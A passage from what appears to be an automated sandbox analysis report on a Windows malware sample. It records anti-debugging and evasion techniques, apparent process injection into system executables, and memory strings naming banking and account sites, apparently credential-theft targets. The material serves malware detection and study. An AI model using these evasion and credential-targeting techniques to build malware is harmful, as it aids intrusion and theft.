                Source: VSP469620.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: VSP469620.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00ACE01E LoadLibraryA,GetProcAddress,2_2_00ACE01E
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AD6B05 push ecx; ret 2_2_00AD6B18
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00ADBDAA push edi; ret 2_2_00ADBDAC
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00ADBEC3 push esi; ret 2_2_00ADBEC5
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00E88B8F push C4549857h; retf 2_2_00E88B9E
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00E88CFF push ds; iretd 2_2_00E88CDB
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00E88CB9 push ds; iretd 2_2_00E88CDB
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00E88C3D push ds; iretd 2_2_00E88CDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006DD8AE push ss; ret 4_2_006DD8AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006D2184 push ds; ret 4_2_006D21DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006E719B push ds; iretd 4_2_006E719C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006E8267 push ds; retf 4_2_006E8282
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006E42D0 push ds; ret 4_2_006E42D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006D3290 push eax; ret 4_2_006D3292
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006E4BEB push FFFFFFB6h; ret 4_2_006E4BED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006D5B87 push es; iretd 4_2_006D5B88
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006E3C24 push edi; retf 4_2_006E3C2C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006F4C23 push ds; ret 4_2_006F4CC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006FDCC3 push ss; retf 4_2_006FDCF7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006F6D03 push edi; ret 4_2_006F6D0E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006E85D5 push edi; iretd 4_2_006E85E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006E66FD push ebp; iretd 4_2_006E6798
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006E66D3 push ebp; iretd 4_2_006E6798
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0320225F pushad ; ret 4_2_032027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032027FA pushad ; ret 4_2_032027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032309AD push ecx; mov dword ptr [esp], ecx4_2_032309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0320283D push eax; iretd 4_2_03202858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0320135E push eax; iretd 4_2_03201369
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045127FA pushad ; ret 7_2_045127F9
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0451225F pushad ; ret 7_2_045127F9
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0451283D push eax; iretd 7_2_04512858
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045409AD push ecx; mov dword ptr [esp], ecx7_2_045409B6
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B18111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00B18111
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00ACEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00ACEB42
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AD123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00AD123A
                Source: C:\Users\user\Desktop\VSP469620.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\VSP469620.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\VSP469620.exeAPI/Special instruction interceptor: Address: E88404
                Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8418CD324
                Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8418CD7E4
                Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8418CD944
                Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8418CD504
                Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8418CD544
                Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8418CD1E4
                Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8418D0154
                Source: C:\Windows\SysWOW64\icsunattend.exeAPI/Special instruction interceptor: Address: 7FF8418CDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0327096E rdtsc 4_2_0327096E
                Source: C:\Users\user\Desktop\VSP469620.exeEvaded block: after key decisiongraph_2-88848
                Source: C:\Users\user\Desktop\VSP469620.exeEvaded block: after key decisiongraph_2-87940
                Source: C:\Users\user\Desktop\VSP469620.exeAPI coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\icsunattend.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\icsunattend.exe TID: 5972Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exe TID: 5972Thread sleep time: -70000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe TID: 5936Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe TID: 5936Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\icsunattend.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AF6CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00AF6CA9
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AF60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00AF60DD
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AF63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00AF63F9
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AFEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00AFEB60
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AFF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00AFF5FA
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AFF56F FindFirstFileW,FindClose,2_2_00AFF56F
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B01B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00B01B2F
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B01C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00B01C8A
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B01F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00B01F94
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0036C730 FindFirstFileW,FindNextFileW,FindClose,7_2_0036C730
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00ACDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_00ACDDC0
                Source: 2780E4D.7.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: 2780E4D.7.drBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: 2780E4D.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: 2780E4D.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: 2780E4D.7.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: 2780E4D.7.drBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: 2780E4D.7.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: 2780E4D.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: 2780E4D.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: 2780E4D.7.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: 2780E4D.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: 2780E4D.7.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: 2780E4D.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: 2780E4D.7.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: icsunattend.exe, 00000007.00000002.3142248419.0000000002856000.00000004.00000020.00020000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3143171871.0000000000CAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 0000000C.00000002.2117384710.00000170A6DDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
                Source: 2780E4D.7.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: 2780E4D.7.drBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: 2780E4D.7.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: 2780E4D.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: 2780E4D.7.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: 2780E4D.7.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: 2780E4D.7.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: 2780E4D.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: 2780E4D.7.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: 2780E4D.7.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: 2780E4D.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: 2780E4D.7.drBinary or memory string: global block list test formVMware20,11696501413
                Source: 2780E4D.7.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: 2780E4D.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: 2780E4D.7.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: 2780E4D.7.drBinary or memory string: discord.comVMware20,11696501413f
                Source: 2780E4D.7.drBinary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Users\user\Desktop\VSP469620.exeAPI call chain: ExitProcess graph end nodegraph_2-87720
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0327096E rdtsc 4_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006E7923 LdrLoadDll,4_2_006E7923
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B06AAF BlockInput,2_2_00B06AAF
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AB3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,2_2_00AB3D19
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AE3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,2_2_00AE3920
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00ACE01E LoadLibraryA,GetProcAddress,2_2_00ACE01E
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00E87060 mov eax, dword ptr fs:[00000030h]2_2_00E87060
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00E886D0 mov eax, dword ptr fs:[00000030h]2_2_00E886D0
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00E88670 mov eax, dword ptr fs:[00000030h]2_2_00E88670
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03308324 mov eax, dword ptr fs:[00000030h]4_2_03308324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03308324 mov ecx, dword ptr fs:[00000030h]4_2_03308324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03308324 mov eax, dword ptr fs:[00000030h]4_2_03308324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03308324 mov eax, dword ptr fs:[00000030h]4_2_03308324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326A30B mov eax, dword ptr fs:[00000030h]4_2_0326A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326A30B mov eax, dword ptr fs:[00000030h]4_2_0326A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326A30B mov eax, dword ptr fs:[00000030h]4_2_0326A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322C310 mov ecx, dword ptr fs:[00000030h]4_2_0322C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03250310 mov ecx, dword ptr fs:[00000030h]4_2_03250310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D437C mov eax, dword ptr fs:[00000030h]4_2_032D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B2349 mov eax, dword ptr fs:[00000030h]4_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B2349 mov eax, dword ptr fs:[00000030h]4_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B2349 mov eax, dword ptr fs:[00000030h]4_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B2349 mov eax, dword ptr fs:[00000030h]4_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B2349 mov eax, dword ptr fs:[00000030h]4_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B2349 mov eax, dword ptr fs:[00000030h]4_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B2349 mov eax, dword ptr fs:[00000030h]4_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B2349 mov eax, dword ptr fs:[00000030h]4_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B2349 mov eax, dword ptr fs:[00000030h]4_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B2349 mov eax, dword ptr fs:[00000030h]4_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B2349 mov eax, dword ptr fs:[00000030h]4_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B2349 mov eax, dword ptr fs:[00000030h]4_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B2349 mov eax, dword ptr fs:[00000030h]4_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B2349 mov eax, dword ptr fs:[00000030h]4_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B2349 mov eax, dword ptr fs:[00000030h]4_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B035C mov eax, dword ptr fs:[00000030h]4_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B035C mov eax, dword ptr fs:[00000030h]4_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B035C mov eax, dword ptr fs:[00000030h]4_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B035C mov ecx, dword ptr fs:[00000030h]4_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B035C mov eax, dword ptr fs:[00000030h]4_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B035C mov eax, dword ptr fs:[00000030h]4_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FA352 mov eax, dword ptr fs:[00000030h]4_2_032FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D8350 mov ecx, dword ptr fs:[00000030h]4_2_032D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0330634F mov eax, dword ptr fs:[00000030h]4_2_0330634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322E388 mov eax, dword ptr fs:[00000030h]4_2_0322E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322E388 mov eax, dword ptr fs:[00000030h]4_2_0322E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322E388 mov eax, dword ptr fs:[00000030h]4_2_0322E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325438F mov eax, dword ptr fs:[00000030h]4_2_0325438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325438F mov eax, dword ptr fs:[00000030h]4_2_0325438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03228397 mov eax, dword ptr fs:[00000030h]4_2_03228397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03228397 mov eax, dword ptr fs:[00000030h]4_2_03228397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03228397 mov eax, dword ptr fs:[00000030h]4_2_03228397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032403E9 mov eax, dword ptr fs:[00000030h]4_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032403E9 mov eax, dword ptr fs:[00000030h]4_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032403E9 mov eax, dword ptr fs:[00000030h]4_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032403E9 mov eax, dword ptr fs:[00000030h]4_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032403E9 mov eax, dword ptr fs:[00000030h]4_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032403E9 mov eax, dword ptr fs:[00000030h]4_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032403E9 mov eax, dword ptr fs:[00000030h]4_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032403E9 mov eax, dword ptr fs:[00000030h]4_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324E3F0 mov eax, dword ptr fs:[00000030h]4_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324E3F0 mov eax, dword ptr fs:[00000030h]4_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324E3F0 mov eax, dword ptr fs:[00000030h]4_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032663FF mov eax, dword ptr fs:[00000030h]4_2_032663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032EC3CD mov eax, dword ptr fs:[00000030h]4_2_032EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323A3C0 mov eax, dword ptr fs:[00000030h]4_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323A3C0 mov eax, dword ptr fs:[00000030h]4_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323A3C0 mov eax, dword ptr fs:[00000030h]4_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323A3C0 mov eax, dword ptr fs:[00000030h]4_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323A3C0 mov eax, dword ptr fs:[00000030h]4_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323A3C0 mov eax, dword ptr fs:[00000030h]4_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032383C0 mov eax, dword ptr fs:[00000030h]4_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032383C0 mov eax, dword ptr fs:[00000030h]4_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032383C0 mov eax, dword ptr fs:[00000030h]4_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032383C0 mov eax, dword ptr fs:[00000030h]4_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE3DB mov eax, dword ptr fs:[00000030h]4_2_032DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE3DB mov eax, dword ptr fs:[00000030h]4_2_032DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE3DB mov ecx, dword ptr fs:[00000030h]4_2_032DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE3DB mov eax, dword ptr fs:[00000030h]4_2_032DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D43D4 mov eax, dword ptr fs:[00000030h]4_2_032D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D43D4 mov eax, dword ptr fs:[00000030h]4_2_032D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322823B mov eax, dword ptr fs:[00000030h]4_2_0322823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03234260 mov eax, dword ptr fs:[00000030h]4_2_03234260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03234260 mov eax, dword ptr fs:[00000030h]4_2_03234260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03234260 mov eax, dword ptr fs:[00000030h]4_2_03234260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322826B mov eax, dword ptr fs:[00000030h]4_2_0322826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E0274 mov eax, dword ptr fs:[00000030h]4_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E0274 mov eax, dword ptr fs:[00000030h]4_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E0274 mov eax, dword ptr fs:[00000030h]4_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E0274 mov eax, dword ptr fs:[00000030h]4_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E0274 mov eax, dword ptr fs:[00000030h]4_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E0274 mov eax, dword ptr fs:[00000030h]4_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E0274 mov eax, dword ptr fs:[00000030h]4_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E0274 mov eax, dword ptr fs:[00000030h]4_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E0274 mov eax, dword ptr fs:[00000030h]4_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E0274 mov eax, dword ptr fs:[00000030h]4_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E0274 mov eax, dword ptr fs:[00000030h]4_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E0274 mov eax, dword ptr fs:[00000030h]4_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B8243 mov eax, dword ptr fs:[00000030h]4_2_032B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B8243 mov ecx, dword ptr fs:[00000030h]4_2_032B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0330625D mov eax, dword ptr fs:[00000030h]4_2_0330625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322A250 mov eax, dword ptr fs:[00000030h]4_2_0322A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03236259 mov eax, dword ptr fs:[00000030h]4_2_03236259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032EA250 mov eax, dword ptr fs:[00000030h]4_2_032EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032EA250 mov eax, dword ptr fs:[00000030h]4_2_032EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032402A0 mov eax, dword ptr fs:[00000030h]4_2_032402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032402A0 mov eax, dword ptr fs:[00000030h]4_2_032402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C62A0 mov eax, dword ptr fs:[00000030h]4_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C62A0 mov ecx, dword ptr fs:[00000030h]4_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C62A0 mov eax, dword ptr fs:[00000030h]4_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C62A0 mov eax, dword ptr fs:[00000030h]4_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C62A0 mov eax, dword ptr fs:[00000030h]4_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C62A0 mov eax, dword ptr fs:[00000030h]4_2_032C62A0
